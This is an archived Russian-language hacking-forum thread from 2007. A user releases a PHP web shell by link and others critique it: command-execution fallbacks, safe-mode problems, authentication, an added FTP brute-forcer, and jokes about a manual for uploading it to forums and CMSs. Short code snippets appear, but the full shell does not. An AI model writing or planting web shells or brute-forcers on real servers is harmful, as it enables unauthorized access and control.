Просмотр полной версии : шелл от меня=)
GreenBear
11.04.2007, 18:33
в общем тут традиция делать шеллы , а я так посмотрел ни разу не сделал =\
естественно онли пост
http://netsec.ru/gb_old/src/shell.phps
похож на шелл ак74
а по делу...
что за тёмносерый текст на светлосером фоне???
пощади глаза
blackybr
11.04.2007, 20:54
В окне листинга неплохо бы сделать выравнивание по колонкам вывода .. сейчас просмотр листинга немного затруднен )
алиасы... мм.. да в принципе не вижу смысла искать конфиг.инк.пхп ))) + ты еще и по маске конфиги ищещь..
GreenBear
11.04.2007, 20:56
ну вообще то я не ищу
просто добавил из р57 =\
как и шелами я тоже не пользуюсь)
про цвета букв - имхо нормально видно
фигово в сейфмоде работает, и в винде вообще
Warning: set_time_limit() [function.set-time-limit]: Cannot set time limit in safe mode
Так если safe-mode, то max_execution_time(0);
nc.STRIEM
11.04.2007, 22:20
молодец! все просто и ясно, без наворотов)
ps напиши еще подробный манул по его заливке)))
молодец! все просто и ясно, без наворотов)
ps напиши еще подробный манул по его заливке)))
норм) поюзаем..
да-да, по заливке для каждого форума/цмс, а то че с ним делать :confused: :p
GreenBear
12.04.2007, 00:09
Обновил.)
Обновил.)
Так получше будет.
GreenBear, если сейф мод включен, то будет не корректно пахать
Напиши еще так max_execution_time(0);
Первое с чем я столкнулся, то что шелл у тебя в UTF-8, а сервер netsec'a отвечает:Content-Type: text/html; charset=windows-1251
if($_POST['download']){
header('Content-Length:'.filesize('/tmp/'.$_POST['download'].'.sql').' ');
header('Content-Type: application/octet-stream');
header("Content-Disposition: attachment; filename={$_POST['download']}.sql");
readfile('/tmp/'.$_POST['download'].'.sql');
die();
}
$_POST['dir'] ? $dir = $_POST['dir'] : $dir = getcwd();
if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v);Как насчёт убрать слэши из переменных до использования последних?
хорошо-бы добавить поддержку использования взаимозаменяемых функций, например в my_exec, кроме popen, добавить system и passthu
ИМХО, яркий действительно глаза напрягает.
Про js, который не нужен я ничего говорить не буду.))
Кстати, не пробовал его проинклудить не первым? Как выглядит?
А вот вопрос, уже давно меня интересует:
Для чего все как один, делают авторизацию по Имени и Паролю, если всё-равно пользователь может быть только 1 ?
GreenBear
13.04.2007, 20:00
Как насчёт убрать слэши из переменных до использования последних?
ты про довнлоад?) а смысл если файл все равно число? да и добавил я уже после )
хорошо-бы добавить поддержку использования взаимозаменяемых функций, например в my_exec, кроме popen, добавить system и passthu
если чесно то тоже не вижу смысла.
Про js, который не нужен я ничего говорить не буду.))
мне так удобнее делать =\
Для чего все как один, делают авторизацию по Имени и Паролю, если всё-равно пользователь может быть только 1 ?
автоматом.
ты про довнлоад?) а смысл если файл все равно число? да и добавил я уже после )Нет, чтоб не получались вот такие пути "C:\\\\\\\\www\\\\\\\\http\\\\\\\\"
если чесно то тоже не вижу смысла.Просто некоторые функции бывают отключены, а про другие забывают.
GreenBear
13.04.2007, 22:40
ну где выключен попен, там и все другие типа систем, ексек тоже =\ в основном. добавить не сложно конечно, но смысла не вижу)
GreenBear
22.04.2007, 19:17
Обновление.
Добавлен фтп брут
качать (http://gb.netsec.ru/src/shell.phps) там же
ОШИБКА
Запрошенный Url не может быть доставлен
Это только у меня так?
-=lebed=-
24.05.2007, 13:00
ОШИБКА
Запрошенный Url не может быть доставлен
Это только у меня так?
нет, сайт не доступен Гринбира...
GreenBear
24.05.2007, 23:32
http://netsec.ru/gb_old/src/shell.phps
ultimatum
24.05.2007, 23:52
спасибо молодец, пользуюсь ак57, но твой тоже придёться затестить )))
+
меня почему-то постоянно куда ненажимаю бросает на страничку с логином и пассом .Набираю test и всё ровно.
Тест провожу на винде
И на хосте под линухой такая же ботва.Хост на агаве
GreenBear
25.05.2007, 10:23
cними авторизацию
ultimatum
25.05.2007, 11:36
// username, password, auth
// $info['username'] = 'test';
// $info['password'] = 'test';
// $info['auth'] = true;
я просто закоментировал , но теперь он просто ничего не делает
GreenBear
25.05.2007, 11:39
закоментируй error_reporting(0);
и посмотри чего пишет ..
я хз чего у тебя там не работает.
ultimatum
25.05.2007, 11:45
Warning: session_start() [function.session-start]: Cannot
send session cookie - headers already sent by (output
started at C:\AppServ\www\she.php:1) in
C:\AppServ\www\she.php on line 16
Warning: session_start() [function.session-start]: Cannot
send session cache limiter - headers already sent (output
started at C:\AppServ\www\she.php:1) in
C:\AppServ\www\she.php on line 16
-----------------------------------------------
вот инфа по машине
Server info:
OS: , Software: Apache/2.2.2 (Win32) PHP/5.1.4
PHP Version: 5.1.4, Safe mode: Off
Disabled Functions: false
MySQL: On, MSSQL: Off, Oracle: Off
-------------------------------
16 строчка
session_start();
GreenBear
25.05.2007, 13:03
пробелов перед <?php
не стоит?
он кстате под виднус не предназначен )
ultimatum
25.05.2007, 13:16
пробелов перед <?php
не стоит?
А причем здесь пробел, если бы php код не рабортал на машине, то сорц бы лез на ружу.
Раз он предназначен под никсы, значит буду тэстить под никсы.А под винду буду другой шел использовать.
Всё ровно ГринБир молодец,спасибо.
GreenBear
25.05.2007, 13:35
хидеры не могу быть посланы после вывода кода страницы.
2ultimatum
У многих редакторов при сохранении в юникоде есть манера впихивать в начало файла три злочастных байта, которые могут подпортить жизнь программисту.
А причем здесь пробел, если бы php код не рабортал на машине, то сорц бы лез на ружу.
Подучи спецификации HTTP, тогда поймешь, почему, выдав хоть один байт в теле ответа, апач больге не может добавить ни один хидер, в данном случае set-cookie.
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot